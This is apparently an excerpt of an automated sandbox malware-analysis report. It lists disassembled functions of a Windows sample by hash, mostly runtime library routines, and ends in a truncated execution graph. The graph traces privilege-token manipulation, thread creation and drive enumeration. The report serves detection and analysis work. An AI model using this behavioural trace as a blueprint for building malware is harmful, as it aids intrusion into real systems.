                    Function 0042082C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __aulldiv__aullrem_get_int64_arg
                    • String ID: 9
                    • API String ID: 3120068967-2366072709
                    • Opcode ID: cccb3587c9681fbdaa943a18ad1e1189ff1b9224d42225ddf1fb12999dc31f06
                    • Instruction ID: b352349d0abf8ddab8a87a43600d6fcad7dfb7831f8de8a6cd45df339719fca8
                    • Opcode Fuzzy Hash: cccb3587c9681fbdaa943a18ad1e1189ff1b9224d42225ddf1fb12999dc31f06
                    • Instruction Fuzzy Hash: 2141D4B1E05629DFEB64CF48D899BAEB7B5FB84300F50819AD049A7342D7385E80CF84
                    Function 004220D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __aulldiv__aullrem_get_int64_arg
                    • String ID: 9
                    • API String ID: 3120068967-2366072709
                    • Opcode ID: f6fe971b6f5119387f4d74b3a6ff84e902a829aa3ee90ffbd37d406e4e89f9c6
                    • Instruction ID: 488917b8c7c67985a8e18c3e25d4ef24386cf9d263a4980f255a4529170af468
                    • Opcode Fuzzy Hash: f6fe971b6f5119387f4d74b3a6ff84e902a829aa3ee90ffbd37d406e4e89f9c6
                    • Instruction Fuzzy Hash: 504117B1A00129EFDB24CF48DA81BAEB7B5FB85314F5045DAD248A7241C7B85E81CF5A
                    Function 0042207D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _get_int64_arg$__aulldiv__aullrem
                    • String ID: 9
                    • API String ID: 2124759748-2366072709
                    • Opcode ID: 8475f9078d8e0c75c7ff64ee551256a7910bda1f27d75c6b35b5af1753b9ec80
                    • Instruction ID: cd4acc34cb8555ab0b4905190398723dae22b1ca216440657a8cc95e7e89e476
                    • Opcode Fuzzy Hash: 8475f9078d8e0c75c7ff64ee551256a7910bda1f27d75c6b35b5af1753b9ec80
                    • Instruction Fuzzy Hash: 304128B1E00129EFDB24CF48DA81BAEB7B5FB85314F5041DAD248A7201C7B85E81CF5A
                    Function 004207DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _get_int64_arg$__aulldiv__aullrem
                    • String ID: 9
                    • API String ID: 2124759748-2366072709
                    • Opcode ID: a03684f63cbc6a91d378d3c7cc75e913b35af2b0ebf61f63ec8f4a56a4cef1d3
                    • Instruction ID: 65eff02fbf90e494715de176285f59ff6280fbbb7a213594a7e9720b430043f1
                    • Opcode Fuzzy Hash: a03684f63cbc6a91d378d3c7cc75e913b35af2b0ebf61f63ec8f4a56a4cef1d3
                    • Instruction Fuzzy Hash: 0741B4B1E05628DFEB64CF58D899BAEB7B5BB44304F6081DAD049A7342D7385E80CF45
                    Function 02215CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsnlen
                    • String ID: U
                    • API String ID: 3628947076-3372436214
                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction ID: 486a0161c1c38377c0f35444cc0cfed13220ea166a8185f9f4baed88cf6e34ec
                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction Fuzzy Hash: 3921F93263830D6AEB109AE49C45FBA73DDDB95250F9001A5F908C6198EB61E9508BA4
                    Function 0040BDF3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • pHead->nBlockUse == nBlockUse, xrefs: 0040BE0B
                    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040BE17
                    • Q^[, xrefs: 0040BEFC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __free_base
                    • String ID: Q^[$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nBlockUse == nBlockUse
                    • API String ID: 3554062276-3053907680
                    • Opcode ID: 30dc6b36dec0630773a793176e514d728d72167c245c156801bd14106862e2f8
                    • Instruction ID: 3735978d0ee80f1e64d9c726da06a5b861fe498d9f887e5bcd441c89eee20921
                    • Opcode Fuzzy Hash: 30dc6b36dec0630773a793176e514d728d72167c245c156801bd14106862e2f8
                    • Instruction Fuzzy Hash: C4212C74A00104EBCB04CF54C981AAAB7B2FB85304F34C1A9D5152B396C779EE42DFD8
                    Function 0040BE6E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • _pLastBlock == pHead, xrefs: 0040BE6E
                    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040BE7A
                    • Q^[, xrefs: 0040BEFC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __free_base
                    • String ID: Q^[$_pLastBlock == pHead$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                    • API String ID: 3554062276-3653239116
                    • Opcode ID: 8cbc9b6b07741f46c4c2b379980c5ad773f240d8e3951d0d9cf4e18136a5f0d3
                    • Instruction ID: 31c58217cfcb371fac728d84a02bc11782a89c8e656bab17c1bbf4894d4547c0
                    • Opcode Fuzzy Hash: 8cbc9b6b07741f46c4c2b379980c5ad773f240d8e3951d0d9cf4e18136a5f0d3
                    • Instruction Fuzzy Hash: 7301A7B4A40104EBC704CB44CA81E6AB3B5FB48304F3481AAE5057B3D2D675DE42DBD9
                    Function 0220A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: p2Q
                    • API String ID: 2102423945-1521255505
                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction ID: c606ee270c1fd1b92342cb9a648602fd63aa55f9f79893d792d07a846b0c8a0e
                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction Fuzzy Hash: 9FF0ED78698754A5F7217790BC26B857ED17B36B09F104088E1182E2E5D3FD238CA79A
                    Function 0223FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0223FBF1
                      • Part of subcall function 0222169C: std::exception::_Copy_str.LIBCMT ref: 022216B5
                    • __CxxThrowException@8.LIBCMT ref: 0223FC06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                    • String ID: TeM$TeM
                    • API String ID: 3662862379-3870166017
                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction ID: 341731c1d9f516ad94de0447c2a8ae03e6abd22d3c9834965769b17e485ff8e2
                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction Fuzzy Hash: 14D01774C0030CBBCB00EFA4D489CDDBBB9AA00304B008062A91897245EA74A34D8F84
                    Function 021FD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0221197D: __wfsopen.LIBCMT ref: 02211988
                    • _fgetws.LIBCMT ref: 021FD15C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wfsopen_fgetws
                    • String ID:
                    • API String ID: 853134316-0
                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction ID: 9a046db4dad3d5db59071a919059b0b56cf48d5fe86743e38c0208844855db6c
                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction Fuzzy Hash: 4091B0B2D403199BCF61DFA4D884BAEB7F5BF14304F140529EA29A3240E775AA14CBD5
                    Function 021FD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$__except_handler4_fprintf
                    • String ID:
                    • API String ID: 1783060780-0
                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                    • Instruction ID: b93b0eaa1e029a340d118f90cb93e25b80ad3e79f6931b1d53a937d7d6539ba1
                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                    • Instruction Fuzzy Hash: 50A1A1B0C10348DBEF15EFD4D845BEEBBB6AF10308F140128E5057A295D7B65A58CFA6
                    Function 02212AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                    • String ID:
                    • API String ID: 2974526305-0
                    • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                    • Instruction ID: e6fd40c331b47fb643a4dc38669fea1574c4f675f2ac3a16ec4325760f953668
                    • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                    • Instruction Fuzzy Hash: 54519570A20316DBDB288FF98880E6E77F6AF60324F148729FD35962D8D7719A50CB40
                    Function 02231359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction ID: f1d27ea09f739b68950590179565907c1827dae4995ec955797404cb778fcb4d
                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction Fuzzy Hash: F60139B242024ABBCF135EC8DC418EE3F63BB19355B488415FA5958428D376C5B1AB81
                    Function 022B7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 022B7A4B
                      • Part of subcall function 022B8140: ___BuildCatchObjectHelper.LIBCMT ref: 022B8172
                      • Part of subcall function 022B8140: ___AdjustPointer.LIBCMT ref: 022B8189
                    • _UnwindNestedFrames.LIBCMT ref: 022B7A62
                    • ___FrameUnwindToState.LIBCMT ref: 022B7A74
                    • CallCatchBlock.LIBCMT ref: 022B7A98
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                    • String ID:
                    • API String ID: 2901542994-0
                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction ID: 487bc73e557d4bea49c5c20f93795bbdd29807d66ce7f7ce6153ef582413ef14
                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction Fuzzy Hash: 7201D732010209BBCF13AF95CC00EEA7BBAEF89798F158014FD1865125D776E961EFA0
                    Function 0040E8B1 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
                    Download Yara Rule
                    APIs
                    • __encode_pointer.LIBCMTD ref: 0040E8CE
                      • Part of subcall function 0040E3A0: TlsGetValue.KERNEL32(00000002,?,0040E88C), ref: 0040E3B5
                      • Part of subcall function 0040E3A0: TlsGetValue.KERNEL32(00000002,00000004,?,0040E88C), ref: 0040E3D6
                      • Part of subcall function 0040E3A0: __crt_wait_module_handle.LIBCMTD ref: 0040E3EC
                      • Part of subcall function 0040E3A0: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040E406
                    • __initptd.LIBCMTD ref: 0040E8E2
                      • Part of subcall function 0040E710: __crt_wait_module_handle.LIBCMTD ref: 0040E747
                      • Part of subcall function 0040E710: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040E775
                      • Part of subcall function 0040E710: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040E78D
                      • Part of subcall function 0040E710: InterlockedIncrement.KERNEL32(004011EC), ref: 0040E7DC
                      • Part of subcall function 0040E710: ___addlocaleref.LIBCMTD ref: 0040E830
                    • GetCurrentThreadId.KERNEL32 ref: 0040E8EA
                    • SetLastError.KERNEL32(00000000), ref: 0040E91A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: AddressProc$Value__crt_wait_module_handle$CurrentErrorIncrementInterlockedLastThread___addlocaleref__encode_pointer__initptd
                    • String ID:
                    • API String ID: 1928116113-0
                    • Opcode ID: c698eb428d43e6d2b822227f5421914c0a4a5299fb2c5a40d23fd6c9f52771f8
                    • Instruction ID: 6b811ade0f21c2bd57ec840f8f64008f1aaf904d2433e274f5d019cd4288e437
                    • Opcode Fuzzy Hash: c698eb428d43e6d2b822227f5421914c0a4a5299fb2c5a40d23fd6c9f52771f8
                    • Instruction Fuzzy Hash: 0101D6B5D00204AFCB10DFE5DC85B9E7B74AB88314F0049A9E504773D2DB369690CB55
                    Function 0040BA6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • _CrtCheckMemory(), xrefs: 0040BA88
                    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040BA94
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: CheckMemory
                    • String ID: _CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                    • API String ID: 2067751306-2660621803
                    • Opcode ID: 5433308e8f4e84225569701af477023b6441a2ec318b6dc33cad52ec8848c87c
                    • Instruction ID: b6f55d797f9ee7486d70e12e7436f537b53ff926f87c3b7e77d92a2d642bce29
                    • Opcode Fuzzy Hash: 5433308e8f4e84225569701af477023b6441a2ec318b6dc33cad52ec8848c87c
                    • Instruction Fuzzy Hash: F0F02B70B80345AADB10DB54EE82F223214E700308F20807BE6247D2D3D7FD55888F9E
                    Function 0040BED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __free_base
                    • String ID: Q^[$6V
                    • API String ID: 3554062276-2052353471
                    • Opcode ID: a7126e3508652008d7cc2ac79bab715f6ce52c07d958abc72e6e4f79b0da5928
                    • Instruction ID: 3641529fe5a497b1f5c4115c369ea7e2d75bc3ce66567566c5502d09d1ab9248
                    • Opcode Fuzzy Hash: a7126e3508652008d7cc2ac79bab715f6ce52c07d958abc72e6e4f79b0da5928
                    • Instruction Fuzzy Hash: 5DE022B8E00004EBCB04CB44DE8086EB3B4EB88308B3041AAE506A3302D636DF529B99

                    Execution Graph

                    Execution Coverage:31.9%
                    Dynamic/Decrypted Code Coverage:10.4%
                    Signature Coverage:12.8%
                    Total number of Nodes:297
                    Total number of Limit Nodes:12
                    execution_graph 1018 d114e1 1019 d11541 1018->1019 1020 d114fd GetModuleHandleA 1018->1020 1023 d11573 1019->1023 1024 d11549 1019->1024 1021 d11512 1020->1021 1022 d1151a VirtualQuery 1020->1022 1021->1019 1022->1021 1029 d11638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1023->1029 1025 d11566 1024->1025 1046 d11af9 1024->1046 1027 d11579 ExitProcess 1030 d1167a 1029->1030 1031 d1167f 1029->1031 1064 d1139f GetVersionExA 1030->1064 1052 d11718 GetSystemTimeAsFileTime 1031->1052 1034 d11686 1035 d116ca 1034->1035 1038 d116a0 CreateThread 1034->1038 1036 d116d0 1035->1036 1037 d116d7 1035->1037 1085 d11581 1036->1085 1040 d116dd lstrcpy 1037->1040 1041 d1170f 1037->1041 1057 d12c48 memset 1038->1057 1301 d11099 1038->1301 1040->1027 1041->1027 1045 d11718 3 API calls 1045->1035 1047 d11b11 1046->1047 1048 d11b09 1046->1048 1050 d11b16 CreateThread 1047->1050 1051 d11b0f 1047->1051 1049 d11638 188 API calls 1048->1049 1049->1051 1050->1051 1320 d11638 189 API calls 1050->1320 1051->1025 1053 d11735 SHSetValueA 1052->1053 1054 d11754 1052->1054 1056 d11786 __aulldiv 1053->1056 1055 d1175a SHGetValueA 1054->1055 1054->1056 1055->1056 1056->1034 1091 d11973 PathFileExistsA 1057->1091 1059 d12cb2 1062 d116ba WaitForSingleObject 1059->1062 1063 d12cbb VirtualFree 1059->1063 1061 d12c8f CreateThread WaitForMultipleObjects 1061->1059 1113 d12b8c memset GetLogicalDriveStringsA 1061->1113 1062->1045 1063->1062 1065 d114da 1064->1065 1066 d113cf LookupPrivilegeValueA 1064->1066 1065->1031 1067 d113ef 1066->1067 1068 d113e7 1066->1068 1067->1065 1286 d1120e GetModuleHandleA GetProcAddress 1067->1286 1281 d1119f GetCurrentProcess OpenProcessToken 1068->1281 1074 d11448 GetCurrentProcessId 1074->1065 1075 d11457 1074->1075 1075->1065 1076 d11319 3 API calls 1075->1076 1077 d1147f 1076->1077 1078 d11319 3 API calls 1077->1078 1079 d1148e 1078->1079 1079->1065 1080 d11319 3 